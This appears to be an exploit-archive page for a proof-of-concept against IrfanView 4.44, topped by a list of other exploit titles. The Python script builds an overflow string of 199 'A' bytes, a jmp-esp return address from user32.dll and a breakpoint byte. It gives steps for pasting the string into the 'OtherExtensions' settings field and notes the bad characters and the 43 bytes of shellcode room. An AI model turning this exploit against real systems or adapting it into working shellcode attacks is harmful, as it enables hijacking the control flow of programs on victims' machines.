e4147fb21e
5 new exploits Panda Free Antivirus - 'PSKMAD.sys' Denial of Service IrfanView 4.44 - Denial of Service Emby MediaServer 3.2.5 - SQL Injection Emby MediaServer 3.2.5 - Password Reset Emby MediaServer 3.2.5 - Directory Traversal
30 lines
No EOL
890 B
Python
Executable file
30 lines
No EOL
890 B
Python
Executable file
# Exploit Title: Irfanview - OtherExtensions Input Overflow
|
|
# Date: 29-04-2017
|
|
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
|
|
# Exploit Author: Dreivan Orprecio
|
|
#Version: Irfanview 4.44
|
|
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
|
|
#Debugging Machine: WinXP Pro SP3 (32bit)
|
|
|
|
|
|
#POC
|
|
|
|
#!usr/bin/python
|
|
|
|
|
|
eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
|
|
|
|
|
|
|
|
buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc"
|
|
|
|
print buffer #a) irfanview->Option->Properties/Settings->Extensions
|
|
#b) Paste the buffer in the "other" input then press ok, repeat a) and b)
|
|
|
|
|
|
|
|
|
|
|
|
#badcharacters: those instruction that start with 6,7,8,E,F
|
|
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
|
|
#Any other way around this? |